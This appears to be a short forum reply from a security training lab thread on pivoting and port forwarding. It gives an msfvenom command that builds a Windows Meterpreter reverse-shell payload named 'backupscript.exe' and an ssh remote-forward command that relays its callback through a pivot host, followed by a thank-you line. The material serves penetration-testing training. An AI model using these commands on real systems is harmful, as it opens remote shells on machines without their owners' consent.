Pivoting, tunneling, and port forwarding | Academy

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=(Internal IP of Pivot Host) -f exe -o backupscript.exe LPORT=8080

ssh -R (Internal Ip of Pivot Host):8080:0.0.0.0:8000 ubuntu@(Target IP) -vN

youre a spartan warrior! =D thanx a lot, i was struggling =S